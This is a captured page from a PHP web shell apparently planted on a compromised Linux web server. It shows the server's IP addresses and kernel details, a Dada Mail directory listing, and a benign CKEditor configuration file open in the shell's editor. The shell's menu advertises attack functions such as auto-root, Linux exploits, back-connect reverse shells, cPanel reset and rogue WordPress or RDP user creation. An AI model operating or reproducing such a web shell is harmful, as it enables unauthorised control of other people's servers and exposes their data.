Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.219.12.88
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
dada /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.dada_config
14.94
KB
-rw-r--r--
.htaccess
788
B
-rw-r--r--
Config.pm
60.7
KB
-rw-r--r--
_dada_mail_config.js
2.25
KB
-rw-r--r--
config.local.php
9.3
KB
-rw-r--r--
dada_mail_config.js
2.73
KB
-rw-r--r--
fileindex.php
90
B
-rw-r--r--
filemanager.config.json
4.93
KB
-rw-r--r--
filemanager.php
3.67
KB
-rw-r--r--
import.php
3.06
KB
-rw-r--r--
info.xml
3.48
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
8.56
KB
-rw-r--r--
install.xml
1.72
KB
-rw-r--r--
md5
6.32
KB
-rw-r--r--
notes.txt
1.62
KB
-rw-r--r--
wwwindex.php
23
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dada_mail_config.js
/* Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKEDITOR.editorConfig = function(config) { config.uploadUrl = '[[softurl]]/mail.cgi'; config.imageUploadUrl = '[[softurl]]/mail.cgi'; config.filebrowserBrowseUrl = '[[wwwurl]]/dada_mail_support_files/RichFilemanager/index.html?type=files&rand_string=' + rand_string(); config.filebrowserImageBrowseUrl = '[[wwwurl]]/dada_mail_support_files/RichFilemanager/index.html?type=images&rand_string=' + rand_string(); config.filebrowserFlashBrowseUrl = '[[wwwurl]]/dada_mail_support_files/RichFilemanager/index.html?type=flash&rand_string=' + rand_string(); config.filebrowserUploadUrl = null; config.filebrowserImageUploadUrl = null; config.filebrowserFlashUploadUrl = null; config.removeDialogTabs = 'link:upload;image:Link;image:Upload'; config.height = '30em'; config.fullPage = true; config.startupOutlineBlocks = true; config.allowedContent = true; config.disallowedContent = 'img{width,height}'; config.extraAllowedContent = 'img[alt,border,width,height,align,vspace,hspace,!src];'; config.strinsert_button_label = 'Tags'; config.strinsert_button_title = 'Tags'; config.strinsert_button_voice = 'Tags'; config.extraPlugins = 'strinsert,image2,uploadimage'; config.removePlugins = 'image,exportpdf'; config.toolbar_DadaMail_Admin = [ { name: 'basicstyles', items : [ 'strinsert', 'Bold','Italic','Underline','Strike','Subscript','Superscript','-','RemoveFormat' ] }, { name: 'styles', items : [ 'Styles','Format','Font','FontSize' ] }, { name: 'colors', items : [ 'TextColor','BGColor' ] }, '/', { name: 'paragraph', items : [ 'NumberedList','BulletedList','-','Outdent','Indent','-','Blockquote','CreateDiv','-','JustifyLeft','JustifyCenter','JustifyRight','JustifyBlock','-','BidiLtr','BidiRtl' ] }, { name: 'links', items : [ 'Link','Unlink','Anchor' ] }, { name: 'insert', items : [ 'Image','Table','HorizontalRule','Smiley','SpecialChar' ] }, '/', { name: 'clipboard', items : [ 'Cut','Copy','Paste','PasteText','PasteFromWord','-','Undo','Redo' ] }, { name: 'editing', items : [ 'Find','Replace','-','SelectAll','-','SpellChecker', 'Scayt' ] }, { name: 'document', items : [ 'Source','Maximize', 'ShowBlocks'] }, ]; }; function rand_string() { return Math.random().toString(36).substring(2, 15) + Math.random().toString(36).substring(2, 15); }
Close